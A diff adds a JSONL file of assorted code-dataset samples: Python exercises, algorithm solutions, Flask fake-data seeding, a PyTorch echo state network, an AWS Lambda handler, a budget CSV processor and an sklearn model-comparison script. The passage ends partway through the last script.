diff --git "a/6610.jsonl" "b/6610.jsonl" new file mode 100644--- /dev/null +++ "b/6610.jsonl" @@ -0,0 +1,609 @@ +{"seq_id":"128435842","text":"from tkinter import *\r\n\r\nwindowWidth = 800\r\nwindowHeight = 800\r\nroot = Tk()\r\n\r\ncanvas = Canvas(root, width=windowWidth, height=windowHeight, borderwidth=0, highlightthickness=0, bg=\"#000050\")\r\ncanvas.grid()\r\n \r\n# this code runs whenever the mouse is clicked on the window\r\ndef mouse_pressed(event):\r\n # draws a dark blue background\r\n canvas.create_rectangle(0, 0, windowWidth, windowHeight, fill=\"#000050\")\r\n # x and y will be equal to the mouse pointer's x and y location\r\n x = event.x\r\n y = event.y\r\n \r\n # this defines the x and y coordinated of all three points\r\n # of a triangle\r\n shipPoints = [x+100, y, x-100, y, x-100, y+250, x+100, y+250]\r\n outerFirePoints = [x+100, y+250, x+150, y+300, x-150, y+300, x-100, y+250]\r\n firePoints = [x+175, y+300, x+200, y+350, x-200, y+350, x-175, y+300]\r\n shipTop = [x+100, y, x-100, y, x, y-150]\r\n canvas.create_polygon(shipPoints, fill='gray', width=2) #draws triangle\r\n \r\n #1. Add details to your rocket to make it look better. You can look at rocket.png for inspiration.\r\n canvas.create_polygon(outerFirePoints, fill='orange', width=1)\r\n canvas.create_polygon(firePoints, fill='red', width=1)\r\n canvas.create_polygon(shipTop, fill = 'black', width=1)\r\n #2. Modify the locations of the shapes above so the rocket will be drawn where the mouse is clicked\r\n \r\n\r\ncanvas.bind(\"\", mouse_pressed)\r\n\r\nroot.mainloop()","sub_path":"_04_int/_4_rocket_ship/rocket_ship.py","file_name":"rocket_ship.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"304916808","text":"# coding=utf-8\n\"\"\"Unique Substrings in Wraparound String.\n\n>>> solve = _solve\n>>> solve('cac')\n2\n>>> solve('zab')\n6\n>>> solve('abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz')\n1027\n\"\"\"\n\n\n# 考虑以 a-z 每个字母开头的字符串\ndef _solve(p):\n if not p:\n return 0\n dp = {chr(97 + i): 0 for i in xrange(26)}\n nxt = {chr(97 + i): chr(97 + i + 1) for i in xrange(25)}\n nxt['z'] = 'a'\n p += '#'\n start, count, length = 0, 1, len(p)\n for i in xrange(1, length):\n if nxt[p[i - 1]] == p[i]:\n count += 1\n else:\n for ch in p[start:i]:\n if count > dp[ch]:\n dp[ch] = count\n else:\n break\n count -= 1\n start = i\n count = 1\n return sum(dp.values())\n\n\n# 如果考虑以某个字母结束,代码会简洁很多\ndef _solve1(p):\n if not p:\n return 0\n dp = {chr(97 + i): 0 for i in xrange(26)}\n nxt = {chr(97 + i): chr(97 + i + 1) for i in xrange(25)}\n nxt['z'] = 'a'\n count, length = 1, len(p)\n dp[p[0]] = 1\n for i in xrange(1, length):\n if nxt[p[i - 1]] == p[i]:\n count += 1\n else:\n count = 1\n if count > dp[p[i]]:\n dp[p[i]] = count\n return sum(dp.values())\n","sub_path":"medium/467.py","file_name":"467.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"116813728","text":"#!/usr/bin/python3\r\n\"\"\"\r\n@Author : Zhaohui Mei(梅朝辉)\r\n@Email : mzh.whut@gmail.com\r\n\r\n@Time : 2018/11/19 21:32\r\n@File : fakes.py\r\n@Version : 1.0\r\n@Interpreter: Python3.6.2\r\n@Software: PyCharm\r\n\r\n@Description: 构建虚拟数据函数\r\n\"\"\"\r\nimport random\r\nfrom faker import Faker\r\n\r\nfrom bluelog.models import Admin, Category, Post, Comment\r\nfrom bluelog.extensions import db\r\nfrom sqlalchemy.exc import IntegrityError\r\n\r\nfake = Faker()\r\n\r\n\r\ndef fake_admin():\r\n \"\"\"生成虚拟管理员信息\"\"\"\r\n admin = Admin(\r\n username='admin',\r\n blog_title='Bluglog',\r\n blog_sub_title=\"No,I'm the real thing.\",\r\n name='meizhaohui',\r\n about='Enjoy your life'\r\n )\r\n # 注:当在models.py中Admin类中继承UserMixin时,此处会变黄\r\n # 生成虚拟数据时,可将Admin类中的UserMixin去掉\r\n admin.password = 'Helloflask'\r\n db.session.add(admin)\r\n db.session.commit()\r\n\r\n\r\ndef fake_categories(count=10):\r\n \"\"\"生成虚拟分类信息\"\"\"\r\n category = Category(name='default')\r\n db.session.add(category)\r\n try:\r\n db.session.commit()\r\n except IntegrityError:\r\n db.session.rollback()\r\n\r\n for i in range(count):\r\n category = Category(name=fake.word())\r\n db.session.add(category)\r\n try:\r\n db.session.commit()\r\n except IntegrityError:\r\n db.session.rollback()\r\n\r\n\r\ndef fake_posts(count=50):\r\n \"\"\"生成虚拟文章\"\"\"\r\n for i in range(count):\r\n post = Post(\r\n title=fake.sentence(),\r\n body=fake.text(500),\r\n timestamp=fake.date_time_this_year()\r\n )\r\n post.category = Category.query.get(\r\n random.randint(1, Category.query.count()))\r\n db.session.add(post)\r\n db.session.commit()\r\n\r\n\r\ndef fake_comments(count=500):\r\n \"\"\"生成虚拟评论\"\"\"\r\n for i in range(count):\r\n comment = Comment(\r\n author=fake.name(),\r\n email=fake.ascii_email(),\r\n site=fake.url(),\r\n body=fake.sentence(),\r\n timestamp=fake.date_time_this_year(),\r\n reviewed=True,\r\n post=Post.query.get(random.randint(1, Post.query.count()))\r\n )\r\n db.session.add(comment)\r\n\r\n salt = int(count * 0.1)\r\n for i in range(salt):\r\n # 未审核评论\r\n comment = Comment(\r\n author=fake.name(),\r\n email=fake.ascii_email(),\r\n site=fake.url(),\r\n body=fake.sentence(),\r\n timestamp=fake.date_time_this_year(),\r\n reviewed=False,\r\n post=Post.query.get(random.randint(1, Post.query.count()))\r\n )\r\n db.session.add(comment)\r\n\r\n # 管理员发表的评论\r\n comment = Comment(\r\n author='meizhaohui',\r\n email=fake.ascii_email(),\r\n site=fake.url(),\r\n body=fake.sentence(),\r\n timestamp=fake.date_time_this_year(),\r\n from_admin=True,\r\n reviewed=True,\r\n post=Post.query.get(random.randint(1, Post.query.count()))\r\n )\r\n db.session.add(comment)\r\n db.session.commit()\r\n\r\n # 回复\r\n for i in range(salt):\r\n # 未审核评论\r\n comment = Comment(\r\n author=fake.name(),\r\n email=fake.ascii_email(),\r\n site=fake.url(),\r\n body=fake.sentence(),\r\n timestamp=fake.date_time_this_year(),\r\n reviewed=True,\r\n post=Post.query.get(random.randint(1, Post.query.count())),\r\n replied=Comment.query.get(random.randint(1, Comment.query.count()))\r\n )\r\n db.session.add(comment)\r\n db.session.commit()\r\n\r\n","sub_path":"bluelog/fakes.py","file_name":"fakes.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"224021103","text":"###############################################################################\n# Copyright 2012 to the present, Orbitz Worldwide, LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\n\nimport context\n\n__doc__ = \"\"\"\nThis package makes it a little bit easier to write higher level objects.\n\nWarning you will still need the lower lever API to figure out complex\nrelationships. This package just makes simple things easier.\n\"\"\"\n\nclass HOSTDBNode(context.EntityContext):\n \"\"\"Special Class to encapsulate lower level ROMEO API\"\"\"\n entityAttr = None\n specialKeys = []\n entity = None\n\n def __init__(self, RomeoKeyValueInstance):\n \"\"\"overrode the default constructor\"\"\"\n setattr(self, self.entityAttr, RomeoKeyValueInstance)\n self.data = {}\n\n def __getattribute__(self, name):\n if name.startswith('get_'):\n return lambda: _gettr_(self, name.replace('get_',''))\n try: return context.EntityContext.__getattribute__(self, name)\n except AttributeError:\n if name in self.specialKeys: return self.get(name)\n raise #re-raise original exception\n\n def __repr__(self):\n if self.__class__.__name__ == 'ENVIRONMENT':\n return self.entity.get('NAME').VALUE\n return \"HOSTDBNODE(%s)\" % (self.__class__.__name__,)\n\n\ndef _gettr_(obj, key_name):\n entity = getattr(obj, obj.entityAttr)\n x = entity.get(key_name)\n if hasattr(x, '__iter__'):\n return _iter_(entity, x)\n if isinstance(x, entity.__class__):\n if x.COMPLEX_CONSTRUCTOR:\n return node_constructor(x)\n return x.VALUE\n return x\n\ndef _iter_(entity, objects):\n for x in objects:\n if isinstance(x, entity.__class__):\n if x.COMPLEX_CONSTRUCTOR:\n yield node_constructor(x)\n else: yield x.VALUE\n else: yield x\n\ndef node_constructor(RomeoKeyValueInstance):\n from romeo.foundation import RomeoKeyValue\n if not isinstance(RomeoKeyValueInstance, RomeoKeyValue):\n raise TypeError('Cannot adapt <%s> to ' % \\\n str(RomeoKeyValueInstance))\n\n keys = [ i for i in RomeoKeyValueInstance.keys() if i != \\\n RomeoKeyValueInstance.KEY ]\n members = { \n 'entityAttr': str(RomeoKeyValueInstance.KEY),\n 'specialKeys': list(keys),\n 'entity': RomeoKeyValueInstance,\n }\n\n #create a new class node\n instance = type(\n str(RomeoKeyValueInstance.KEY),\n (HOSTDBNode,),\n members\n )\n #initilialize the instance now\n return instance(RomeoKeyValueInstance)\n\ndef getEnvironment(name):\n import romeo\n return node_constructor(romeo.getEnvironment(name))\n\ndef listEnvironments():\n import romeo\n return [node_constructor(i) for i in romeo.listEnvironments()]\n\ndef whoami(hostname):\n import romeo\n return node_constructor(romeo.whoami(hostname))\n\ndef me():\n import romeo\n return node_constructor(romeo.whoami())\n\ndef safe_iter(obj):\n if hasattr(obj, '__iter__'):\n return obj\n return (i for i in [obj]) \n","sub_path":"romeo/lib/romeo/hostdb.py","file_name":"hostdb.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"493127489","text":"#方法一:通过非递归中序遍历将所有节点存入列表,然后遍历列表确定每个节点的left和right\r\nclass Node:\r\n def __init__(self, val, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nclass Solution:\r\n def treeToDoublyList(self, root: 'Node') -> 'Node':\r\n def mid_search(root): #标准中序遍历非递归写法\r\n stack = []\r\n res = []\r\n cur = root\r\n while cur or stack:\r\n if cur:\r\n stack.append(cur)\r\n cur = cur.left\r\n else:\r\n top = stack.pop()\r\n res.append(top)\r\n cur = top.right\r\n return res\r\n\r\n res=mid_search(root)\r\n pre=res[-1]\r\n for i in res:\r\n i.left=pre\r\n pre.right=i\r\n pre=i\r\n return res[0]\r\n\r\n#方法二:在非递归中序遍历的过程中确定每个节点的left和right,最后确定头节点的left和尾节点的right\r\nclass Solution:\r\n def treeToDoublyList(self, root: 'Node') -> 'Node':\r\n self.stack = []\r\n self.head = None\r\n self.pre = None\r\n if not root:\r\n return\r\n\r\n def mid_search(root): # 标准中序遍历非递归写法\r\n cur = root\r\n while cur or self.stack:\r\n if cur:\r\n self.stack.append(cur)\r\n cur = cur.left\r\n else:\r\n top = self.stack.pop()\r\n if not self.head:\r\n self.head = top\r\n self.pre = top\r\n\r\n else:\r\n top.left = self.pre\r\n self.pre.right = top\r\n self.pre = top\r\n cur = top.right\r\n\r\n mid_search(root)\r\n self.head.left = self.pre\r\n self.pre.right = self.head\r\n return self.head\r\n\r\n#方法三:递归写法求解中序遍历,其余与方法二类似\r\nclass Node:\r\n def __init__(self, val, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nclass Solution:\r\n def treeToDoublyList(self, root: 'Node') -> 'Node':\r\n if not root: #如果没有链表存在,直接返回\r\n return None\r\n\r\n self.head=None #链表的头节点\r\n self.pre=None #前一个节点\r\n\r\n def midorder(cur):\r\n if not cur:\r\n return\r\n midorder(cur.left) #先向左走到底\r\n if not self.head: #如果没有头节点(初始状态)\r\n self.head=cur\r\n self.pre=cur\r\n else:\r\n cur.left=self.pre #当前节点的左节点为中序遍历前一个节点\r\n self.pre.right=cur#前一个节点的右节点为当前节点\r\n self.pre=cur#前一个节点转为当前节点\r\n midorder(cur.right)\r\n\r\n midorder(root)\r\n #连接首尾节点\r\n self.head.left=self.pre\r\n self.pre.right=self.head\r\n return self.head\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"剑指offor/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"371665056","text":"class Solution:\n \n \"\"\"\n \n Name : Shahreen Shahjahan Psyche\n Time : O(MNlog(MN-K)) [Where M and N is the dimension of the matrix]\n Space: O(MN - K) [The Heap Size]\n \n \"\"\"\n \n def kthSmallest(self, matrix: List[List[int]], k: int) -> int:\n \n # edge case\n if not matrix:\n return float('inf')\n \n import heapq\n \n track = []\n N = len(matrix) * len(matrix[0])\n max_val = float('-inf')\n \n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n heapq.heappush(track, matrix[i][j])\n if len(track) > N - k:\n val = heapq.heappop(track)\n max_val = max(val, max_val)\n return max_val\n","sub_path":"Kth Smallest Element in a Sorted Matrix.py","file_name":"Kth Smallest Element in a Sorted Matrix.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"556317001","text":"import os\nimport time\n\n\ndef log(type, msg):\n logfile = 'bot.log'\n t = str(time.asctime())\n colors = {\n 'info': '\\033[94m'+ t +' | INFO | ',\n 'log': '\\033[95m'+ t +' | LOG | ',\n 'success': '\\033[92m'+ t +' | SUCCESS | ',\n 'warning': '\\033[93m'+ t +' | WARNING | ',\n 'error': '\\033[91m'+ t +' | ERROR | ',\n 'bold': '\\033[1m',\n 'underline': '\\033[4m',\n 'end': '\\033[0m',\n }\n logmessage = colors[type] + msg + colors['end']\n print(logmessage)\n if os.path.isfile(logfile) and os.access(logfile, os.W_OK):\n with open(logfile, \"a\") as file:\n file.write(logmessage+'\\n')\n elif os.access('./', os.W_OK):\n with open(logfile, \"w+\") as file:\n file.write(logmessage+'\\n')\n else:\n print(colors['info']+'Can not Write Log File!'+colors['end'])\n","sub_path":"bot/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"290072974","text":"import os\nimport time\nimport pymysql\nimport logging\nimport sys\n\npwd = os.environ['MYSQL_PWD']\nunix_socket= os.environ['UNIX_SOCKET']\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\ndef insert_log(type, user_id, platform, message, intent, not_handled, confidence):\n #logging.debug(user_id + \" insert_log call: \" + str(int(time.time())))\n conn = pymysql.connect(\n unix_socket=unix_socket,\n user='root',\n password=pwd,\n database='kolon',\n charset='utf8')\n curs = conn.cursor(pymysql.cursors.DictCursor)\n timestamp = int(time.time())\n sql = \"INSERT INTO log(type, user_id, time_stamp, platform, message, intent, not_handled, confidence) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n curs.execute(sql, (\n type, user_id, timestamp, platform, message, intent, not_handled,\n confidence))\n conn.commit()\n curs.close()\n conn.close()\n #logging.debug(user_id + \" insert_log fin: \" + str(int(time.time())))\n","sub_path":"kakao_kolon/db_client.py","file_name":"db_client.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"53384149","text":"import unittest \nfrom base import Base, Character_Query\n\n\nclass TestApi(unittest.TestCase):\n\n def test_Base_request(self):\n \"\"\"Test for request\"\"\"\n response = Base().api_info()['characters']\n self.assertEqual(response,\"https://rickandmortyapi.com/api/character\")\n\n def test_character_name(self):\n \"\"\"Test for resquest character name\"\"\"\n response = Character_Query().get_by_id(1)[\"name\"]\n self.assertEqual(response,'Rick Sanchez')\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"test_case.py","file_name":"test_case.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"415744433","text":"# -*- coding: utf-8 -*-\n\n\nimport matplotlib.pyplot as plt\n\nx= [2,3,5,6,1,4,5,8,2,4,5,7,3]\ny= [2,3,5,6,1,4,5,8,2,4,5,7,3]\n\nplt.scatter(x, y, label=\"Test\", color = \"RED\" , s = 200)\nplt.xlabel('X-axis')\nplt.ylabel(\"Y-axis\")\nplt.title(\"First graph\")\nplt.legend()\nplt.show()","sub_path":"Scaterplot.py","file_name":"Scaterplot.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361111972","text":"import os\nimport json\nimport boto3\nimport datetime\nimport hashlib\nfrom risk_score import *\n\ndynamodb = boto3.resource('dynamodb')\n\ndef calculate_hash(event):\n m = hashlib.sha3_512()\n for key in event:\n m.update(bytes(str(event[key]),'utf-8'))\n return m.hexdigest()\n\ndef lambda_handler(event, context):\n table = dynamodb.Table(os.environ['DYNAMO_TBL'])\n \n score = calculate_score(event)\n \n event['timestamp'] = datetime.utcnow().isoformat()\n event['score'] = score\n event['risk_level'] = risk_level(score)\n \n data = {\n 'hash_id': calculate_hash(event),\n 'data': event\n }\n \n table.put_item(\n Item = data\n )\n \n response = {\n \"hash_id\": data['hash_id'],\n \"timestamp\": event['timestamp'],\n \"risk_score\": event['risk_score'],\n \"risk_level\": event['risk_level']\n }\n \n return {\n 'statusCode': 200,\n 'body': response\n }\n","sub_path":"covid19_selfAssessment/writeAssessment/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"501733288","text":"import time\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\n\nclass ESN(nn.Module):\n def __init__(self, input_size, output_size, r_size=200, spectral_radius=0.95, \n sparsity=0):\n super(ESN, self).__init__()\n\n self.input_size = input_size\n self.output_size = output_size\n self.r_size = r_size\n self.spectral_radius = spectral_radius\n self.sparsity = sparsity\n self.random_state = np.random.RandomState(int(time.time()))\n input_weights = self.random_state.rand(r_size, input_size) * 2 - 1\n input_weights[self.random_state.rand(*input_weights.shape) < self.sparsity] = 0\n\n self.W_in = nn.Parameter(torch.from_numpy(input_weights.astype(np.float32))) \n self.W = self.init_reservoir()\n\n self.tanh = nn.Tanh()\n\n def init_reservoir(self):\n reservoir = self.random_state.rand(self.r_size, self.r_size) - 0.5\n reservoir[self.random_state.rand(*reservoir.shape) < self.sparsity] = 0\n radius = np.max(np.abs(np.linalg.eigvals(reservoir)))\n tensor = torch.from_numpy((reservoir * (self.spectral_radius / radius)).astype(np.float32))\n return nn.Parameter(tensor)\n\n def init_hidden(self):\n reservoir = np.zeros((self.r_size, self.r_size))\n return Variable(torch.from_numpy(reservoir).float())\n\n\n def forward(self, input_tensor, prev_hidden):\n x_in = self.W_in.mv(input_tensor)\n x_W = self.W.mm(prev_hidden)\n update = self.tanh(x_in + x_W)\n \n return update\n","sub_path":"text_generation/models/ESN.py","file_name":"ESN.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"287603748","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n head=cur=ListNode(0)\n cf=0\n while l1 or l2 or cf:\n v1=v2=0\n if l1:\n v1=l1.val\n l1=l1.next\n if l2:\n v2=l2.val\n l2=l2.next\n cf,val= divmod(v1+v2+cf,10)\n cur.next=ListNode(val)\n cur=cur.next\n return head.next","sub_path":"2_AddTwoNumbers.py","file_name":"2_AddTwoNumbers.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"170947272","text":"#encoding: utf8\n\nimport csv\nimport json\nimport logging\nimport sys\n\nROOT_COL = None\ndef indexof(*args):\n row = args[0]\n names = args[1:]\n for name in names:\n for i,_h in enumerate(row):\n h = _h.decode('utf8')\n if all(word in h for word in name.split()):\n return i\n logging.error('cant find %s in row!' % \"/\".join(names))\n logging.error('row=%s' % \", \".join(row))\n return None\n\ndef to_code(row,col):\n t = row[col]\n if '-' in t:\n t = t.split('-')\n assert(len(t)==((col-ROOT_COL+2)/2))\n t= [ \"%02d\" % int(x) for x in t ]\n t = \"00\" + ''.join(t)\n else:\n add = \"0\" * (col-ROOT_COL+4-len(t))\n t=add+t\n return t\n\ndef get_from(row,index,to_add=0):\n try:\n if index is None:\n return None\n val = row[index]\n val = val.replace(\",\",\"\")\n if \".\" in val:\n return float(val)+to_add\n else:\n return int(val)+to_add\n except:\n return None\n\ndef add_to_sums(key,sums,amount,field):\n if amount is not None: sums[key][field] = sums[key].setdefault(field,0)+amount\n\ndef add_to_list(key,sums,item,field):\n if item is not None:\n if item not in sums[key][field]:\n sums[key][field].append(item)\n if len(sums[key][field])>1 and len(key)>=11 and field != 'kind':\n logging.error(\"TOO MANY GROUPS FOR %r\" % sums[key])\n\nclass new_budget_csv(object):\n\n def process(self,input,output,new_years=[]):\n sums = {}\n budgets=csv.reader(file(input))\n YEAR_COL = None\n for row in budgets:\n try:\n year = int(row[YEAR_COL])\n except:\n if YEAR_COL is not None:\n continue\n YEAR_COL = indexof(row,u'שנה')\n SAIF_COL = indexof(row,u'קוד סעיף')\n global ROOT_COL\n ROOT_COL = SAIF_COL\n SAIF_NAME_COL = indexof(row,u'שם סעיף')\n THUM_COL = indexof(row,u'קוד תחום')\n THUM_NAME_COL = indexof(row,u'שם תחום')\n PROG_COL = indexof(row,u'קוד תוכנית')\n PROG_NAME_COL = indexof(row,u'שם תוכנית')\n TAKA_COL = indexof(row,u'קוד תקנה')\n TAKA_NAME_COL = indexof(row,u'שם תקנה מלא',u'שם תקנה')\n\n NET_ALLOC_COL = indexof(row,u'מקורי נטו')\n GROSS_ALLOC_COL = indexof(row,u'מקורי הוצאה מותנית')\n\n DEDICATED_ALLOC_COL = indexof(row,u'מקורי הכנסה מיועדת')\n COMMITMENT_ALLOC_COL = indexof(row,u'מקורי הרשאה')\n PERSONNEL_ALLOC_COL = indexof(row,u'מקורי שיא כא')\n CONTRACTORS_ALLOC_COL = indexof(row,u'מקורי עבצ')\n AMOUNTS_ALLOC_COL = indexof(row,u'מקורי כמויות')\n\n NET_REVISED_COL = indexof(row,u'מאושר נטו')\n GROSS_REVISED_COL = indexof(row,u'תקציב מאושר הוצאה מותנית בהכנסה')\n\n DEDICATED_REVISED_COL = indexof(row,u'מאושר הכנסה מיועדת')\n COMMITMENT_REVISED_COL = indexof(row,u'מאושר הרשאה')\n PERSONNEL_REVISED_COL = indexof(row,u'מאושר שיא כא')\n CONTRACTORS_REVISED_COL = indexof(row,u'מאושר עבצ')\n AMOUNTS_REVISED_COL = indexof(row,u'מאושר כמויות')\n\n USED_COL = indexof(row,u'ביצוע מזומן')\n\n ACTIVE_COL = indexof(row,u'תקנה פעילה')\n\n INOUT_COL = indexof(row,u'סוג הוצאה')\n\n GROUP1_COL = indexof(row,u'שם רמה 1')\n GROUP2_COL = indexof(row,u'שם רמה 2')\n\n\n continue\n for col,title_col in [(SAIF_COL,SAIF_NAME_COL),(THUM_COL,THUM_NAME_COL),(PROG_COL,PROG_NAME_COL),(TAKA_COL,TAKA_NAME_COL)]:\n if col is None or title_col is None:\n continue\n code = to_code(row,col)\n # if len(code) != col+3:\n # logging.error(\"%s, %s\" % (code, row))\n # assert(False)\n new_year = year in new_years and len(code) < 10\n title = row[title_col].decode('utf8')\n net_allocated = get_from(row,NET_ALLOC_COL)\n gross_allocated = get_from(row,GROSS_ALLOC_COL,net_allocated)\n net_revised = get_from(row,NET_REVISED_COL) if not new_year else net_allocated\n gross_revised = get_from(row,GROSS_REVISED_COL,net_revised) if not new_year else gross_allocated\n net_used = get_from(row,USED_COL)\n\n dedicated_allocated = get_from(row,DEDICATED_ALLOC_COL)\n commitment_allocated = get_from(row,COMMITMENT_ALLOC_COL)\n personnel_allocated = get_from(row,PERSONNEL_ALLOC_COL)\n contractors_allocated = get_from(row,CONTRACTORS_ALLOC_COL)\n amounts_allocated = get_from(row,AMOUNTS_ALLOC_COL)\n\n dedicated_revised = get_from(row,DEDICATED_REVISED_COL)\n commitment_revised = get_from(row,COMMITMENT_REVISED_COL)\n personnel_revised = get_from(row,PERSONNEL_REVISED_COL)\n contractors_revised = get_from(row,CONTRACTORS_REVISED_COL)\n amounts_revised = get_from(row,AMOUNTS_REVISED_COL)\n\n if ACTIVE_COL is not None:\n active = row[ACTIVE_COL].decode('utf8') != u'פש\"ח'\n else:\n active = True\n\n tak_kind = 'unknown'\n if INOUT_COL is not None:\n if row[INOUT_COL].decode('utf8') == u'הכנסה':\n tak_kind = 'income'\n elif row[INOUT_COL].decode('utf8') == u'הוצאה':\n tak_kind = 'expense'\n\n all_values = [net_allocated,gross_allocated,gross_allocated,gross_revised,net_used,dedicated_allocated,commitment_allocated,personnel_allocated,contractors_allocated,amounts_allocated,dedicated_revised,commitment_revised,personnel_revised,contractors_revised,amounts_revised]\n all_zeros = sum(abs(x) for x in all_values if x is not None) == 0\n if all_zeros and not active and year not in new_years:\n continue\n\n group1 = group2 = None\n if GROUP1_COL is not None and GROUP2_COL is not None:\n group1 = row[GROUP1_COL].decode('utf8')\n group2 = row[GROUP2_COL].decode('utf8')\n group_top = group1\n group_full = group2\n\n key = \"%s/%s\" % (year,code)\n sums.setdefault(key,{'code':code,'year':year,'title':title,'group_top':[], 'group_full':[],'kind':[]})\n add_to_sums(key,sums,net_allocated,'net_allocated')\n add_to_sums(key,sums,net_revised,'net_revised')\n add_to_sums(key,sums,net_used,'net_used')\n add_to_sums(key,sums,gross_allocated,'gross_allocated')\n add_to_sums(key,sums,gross_revised,'gross_revised')\n\n add_to_sums(key,sums,dedicated_allocated,'dedicated_allocated')\n add_to_sums(key,sums,commitment_allocated,'commitment_allocated')\n add_to_sums(key,sums,personnel_allocated,'personnel_allocated')\n add_to_sums(key,sums,contractors_allocated,'contractors_allocated')\n add_to_sums(key,sums,amounts_allocated,'amounts_allocated')\n\n add_to_sums(key,sums,dedicated_revised,'dedicated_revised')\n add_to_sums(key,sums,commitment_revised,'commitment_revised')\n add_to_sums(key,sums,personnel_revised,'personnel_revised')\n add_to_sums(key,sums,contractors_revised,'contractors_revised')\n add_to_sums(key,sums,amounts_revised,'amounts_revised')\n\n add_to_list(key,sums,group_top,'group_top')\n add_to_list(key,sums,group_full,'group_full')\n add_to_list(key,sums,tak_kind,'kind')\n\n keys = sums.keys()\n keys.sort()\n\n out = file(output,\"w\")\n for key in keys:\n out.write(\"%s\\n\" % json.dumps(sums[key]))\n\nif __name__ == \"__main__\":\n input = sys.argv[1]\n output = sys.argv[-1]\n processor = new_budget_csv().process(input,output,[2014,2015])\n","sub_path":"processors/new_budget_csv.py","file_name":"new_budget_csv.py","file_ext":"py","file_size_in_byte":8517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"58433833","text":"from numpy import random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import model_selection\nfrom sklearn.ensemble import RandomForestClassifier, VotingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import make_scorer\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\n\n# load dataset\nfrom model_evaluator import get_gain\nfrom tools.data_concat_files import *\n\n# data = get_fdax_es_eurusd(\"AG_NO_OPT_STRONG\",\"AG_5\")\n\n# data = get_concatenated_files()\n\n# Drop DAX column\n# cols = [0,2,3,4,5,6,7]\n# cols = [3,4,5,6,7]\n# cols = [0, 1, 3, 4, 5, 7]\n# cols = [0, 1,2, 3, 4, 5, 6, 7]\n# data = data.iloc[:, list(cols)]\n\ndata = get_short_data_fdax_shifted()\ndata = get_short_data()\n# data = get_concatenated_files()\n\n\nprint(data.head())\n\nif 'Profit' in data.columns : data.drop('Profit',axis=1,inplace = True)\n\nY = data['Success']\nX = data.drop('Success',axis=1)\n\n\n# prepare configuration for cross validation test harness\nseed = random.rand(0, 100)\n# prepare models\nmodels = []\nmodels.append(('LR', LogisticRegression()))\nmodels.append(('LDA', LinearDiscriminantAnalysis()))\nmodels.append(('KNN', KNeighborsClassifier()))\nmodels.append(('CART', DecisionTreeClassifier()))\nmodels.append(('NB', GaussianNB()))\nmodels.append(('SVM', SVC()))\nmodels.append(('RFC', RandomForestClassifier()))\nmodels.append(('MLPC', MLPClassifier()))\n\n\ndtc = DecisionTreeClassifier()\nlda = LinearDiscriminantAnalysis()\nrfc = RandomForestClassifier()\nknc = KNeighborsClassifier()\nmlpc = MLPClassifier()\nmodels.append(('VC', VotingClassifier(estimators=[\n ('lda', lda),\n ('knc', knc),\n ('mlpc', mlpc)\n], voting='soft')))\n\n# evaluate each model in turn\nresults = []\nnames = []\nscoring = 'accuracy'\nfor name, model in models:\n kfold = 